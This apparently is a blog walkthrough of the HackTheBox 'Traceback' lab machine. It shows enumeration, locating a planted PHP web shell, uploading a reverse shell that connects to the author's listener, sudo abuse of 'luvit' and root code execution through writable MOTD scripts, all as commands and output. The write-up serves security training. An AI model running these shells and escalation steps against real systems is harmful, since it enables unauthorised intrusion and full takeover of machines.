Traceback.htb

This is a detailed walk-thru for traceback.htb written by dR1PPy

Sometimes the difficulty presented by HTB machines can be challenging, frustrating, and rewarding.

I think the machine TraceBack provides a perfect balance of all 3 of those qualities into a very fun experience.

So far this is my favorite machine of 2020, many thanks to Xh4H for putting this challenge together.

Enumeration

As always NMAP all the things!

Nmap scan report for traceback.htb (10.10.10.181)
Host is up, received user-set (0.070s latency).
Scanned at 2020-03-26 17:41:30 MDT for 69s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbMNfxYPZGAdOf2OAbwXhXDi43/QOeh5OwK7Me/l15Bej9yfkZwuLhyslDCYIvi4fh/2ZxB0MecNYHM+Sf4xR/CqPgIjQ+NuyAPI/c9iXDDhzJ+HShRR5WIqsqBHwtsQFrcQXcfQFYlC+NFj5ro9wfl2+UvDO6srTUxl+GaaabePYm2u0mlmfwHqlaQaB8HOUb436IdavyTdvpW7LTz4qKASrCTPaawigDymMEQTRYXY4vSemIGMD1JbfpErh0mrFt0Hu12dmL6LrqNmUcbakxOXvZATisHU5TloxqH/p2iWJSwFi/g0YyR2JZnIB65fGTLjIhZsOohtSG7vrPk+cZ
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBD2jCEklOC94CKIBj9Lguh3lmTWDFYq41QkI5AtFSx7x+8uOCGaFTqTwphwmfkwZTHL1pzOMoJTrGAN8T7LA2j0=
|   256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL4LOW9SgPQeTZubVmd+RsoO3fhSjRSWjps7UtHOc10p
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial scan reveals the common services found SSH, HTTP
As our dirsearch runs we browse the webpages.

On the default url http://traceback.htb we find the following page which suggests a backdoor.

We Google for the name taking credit for the backdoor and find the following git hub repo.

https://github.com/Xh4H/Web-Shells

Using the names shown in the repo we create a short list

alfa3.php
alfav3.0.1.php
alfav3-encoded.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php

And feed it into Burp for testing.

Which provides us with a name for our backdoor.
https://10.10.10.181/smevk.php

We try to login with the default admin:admin and gain access to the backdoor.

Gaining Access

Now with a php backdoor we need to upgrade this to an actual shell.
We modify pentestmonkey’s PHP shell.

PRO TIP: Since this is a popular machine at the moment we will rename our php shell to some random name.
This will help prevent other users from finding our shell and thinking it is part of the challenge.

mv php-reverse-shell.php `openssl rand -base64 18`.php

Then we use the upload of Xh4H’s backdoor to upload our reverse shell and visit it to get our shell.

http://10.10.10.181/O2me7yuLMZkMrQZYcg.php

nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.10] from traceback.htb [10.10.10.181] 45796
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 10:37:27 up 18:03,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
webadmin

After running enumeration scripts we see we have access to SUDO as sysadmin user.
We can leverage this to get a shell like so.

$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
whoami
sysadmin
python3 -c 'import pty; pty.spawn("/bin/bash")'
TERM=linux

Now we grab our flag and run our enumeration scripts again.
Initially we do not find any of the common paths to escalation.

But we do notice one process shown during enumeration.

root      26039  0.0  0.0  58792  3164 ?        S    10:48   0:00 /usr/sbin/CRON -f
root      26042  0.0  0.0   4628   796 ?        Ss   10:48   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
root      26043  0.0  0.0   7468   772 ?        S    10:48   0:00 sleep 30

To get a better look at what this process may be doing we will leverage PsPy.

./pspy64 -pf -i 1000 
...
2020/04/07 11:06:01 CMD: UID=0    PID=29010  | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/04/07 11:06:01 CMD: UID=0    PID=29008  | /usr/sbin/CRON -f 
2020/04/07 11:06:01 FS:        CLOSE_NOWRITE | /usr/lib/locale/locale-archive
2020/04/07 11:06:31 FS:        CLOSE_NOWRITE | /usr/lib/locale/locale-archive
2020/04/07 11:06:31 CMD: UID=0    PID=29014  | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/ 
2020/04/07 11:06:31 FS:                 OPEN | /usr/lib/locale/locale-archive
2020/04/07 11:06:31 FS:        CLOSE_NOWRITE | /usr/lib/locale/locale-archive
2020/04/07 11:07:01 FS:                 OPEN | /usr/lib/locale/locale-archive
2020/04/07 11:07:01 CMD: UID=0    PID=29020  | sleep 30 

This shows us more details on to the files restored from backup.

Escalating Privileges

Taking a closer look at the files in question shows us some interesting rights.

ls -lha  /var/backups/.update-motd.d/*
-rwxr-xr-x 1 root root  981 Aug 25  2019 /var/backups/.update-motd.d/00-header
-rwxr-xr-x 1 root root  982 Aug 27  2019 /var/backups/.update-motd.d/10-help-text
-rwxr-xr-x 1 root root 4.2K Aug 25  2019 /var/backups/.update-motd.d/50-motd-news
-rwxr-xr-x 1 root root  604 Aug 25  2019 /var/backups/.update-motd.d/80-esm
-rwxr-xr-x 1 root root  299 Aug 25  2019 /var/backups/.update-motd.d/91-release-upgrade

ls -lha /etc/update-motd.d/ 
total 32K
drwxr-xr-x  2 root sysadmin 4.0K Aug 27  2019 .
drwxr-xr-x 80 root root     4.0K Apr  6 17:33 ..
-rwxrwxr-x  1 root sysadmin  981 Apr  7 11:14 00-header
-rwxrwxr-x  1 root sysadmin  982 Apr  7 11:14 10-help-text
-rwxrwxr-x  1 root sysadmin 4.2K Apr  7 11:14 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Apr  7 11:14 80-esm
-rwxrwxr-x  1 root sysadmin  299 Apr  7 11:14 91-release-upgrade

It seems after the restore the files are owned by sysadmin user.
This means we should be able to edit the MOTD files, which may allow us to run some code upon log in when the MOTD is displayed.

For this we will need to get proper SSH access to the box, since an SSH login will run MOTD.
We are unable to modify any files under .ssh for sysadmin user but we can edit them for webadmin user.
Thus we create keys to use this account for SSH access to the box.

ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/webadmin/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/webadmin/.ssh/id_rsa.
Your public key has been saved in /home/webadmin/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:RImGFNltn9odBfmVWLkuZ/ycKtYJw3HFL0ZUcnrdmD4 webadmin@traceback
The key's randomart image is:
+---[RSA 2048]----+
|   .o= o..  .+*o=|
|    o +.+   ..o@+|
|     . ... . +=.*|
|       .  o..o+o.|
|        So..ooE. |
|        . .+.. * |
|            + =.o|
|           o o .o|
|          . ...  |
+----[SHA256]-----+
$ pwd
/home/webadmin/.ssh
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3gzMMwPw97r98wQl+cKjN4u3lJAfzSMIyHJgDulh6KG9amG5BpWhUiMUFI6uW77cRSu+C+Vs8tebAxsYL8hCBb07l/qUgRWFxTS2JeP9ol+Wfo6b4wc1aFh6QwhrsU70JxLvjziLjJ2ylykdD/NtSKS6t6YpNaWJxnyp9pIv3fyGeCI67GNcdj3BeqHUuX68I6XsRIiZ7+uhX7zAV5hopKECtC/cCoTDUWIljq97vmTbyObQv/fKY9qqLYdiG7LhXvJRjmcTFYkib2aJhguYZjEr9J+466+aikclOYLs7InSrSejisfn9XCwBH2BAy0hhLqtXEXvOj4ERWLhQJUBx webadmin@traceback
$ ls
authorized_keys
id_rsa
id_rsa.pub
$ cat id_rsa.pub >> authorized_keys
$ ssh-keyscan -H -t rsa 10.10.10.181 >> known_hosts
$ ssh 10.10.10.181
Pseudo-terminal will not be allocated because stdin is not a terminal.
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

Ok now we need to determine where best to place our code.
We will start with a simple PoC to verify we can get code execution.
For this we will need 2 console terminals open one for each user (WebAdmin & SysAdmin).

From our box we run the following command to login as WebAdmin.
This will delay in order to give us time (7 seconds) to prep our exploit code before triggering it.

sleep 7 && ssh -i webadmin-ssh.id webadmin@traceback.htb

Then as sysadmin user we run

echo "sleep 5 && whoami">> /etc/update-motd.d/00-header

Back in our console we see the following.

sleep 7 && ssh -i webadmin-ssh.id webadmin@traceback.htb
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

root


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Apr  7 15:17:35 2020 from 10.10.14.10
webadmin@traceback:~$ 

We see the results of ‘whoami’ is root, this proves we have the required code execution.
Instead of setting up another reverse shell we just modify our payload to get the flag we need and run the commands again.

echo "sleep 5 && cat /root/root.txt">> /etc/update-motd.d/00-header

Now our SSH console shows the root flag.

sleep 7 && ssh -i webadmin-ssh.id webadmin@traceback.htb
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

<FLAG REMOVED FOR WRITEUP>


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Apr  7 15:18:12 2020 from 10.10.14.10
webadmin@traceback:~$ 

Overall a very fun challenge presented by TraceBack.

Resources

GitHub of Backdoor
https://github.com/Xh4H/Web-Shells

PHP Shell
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: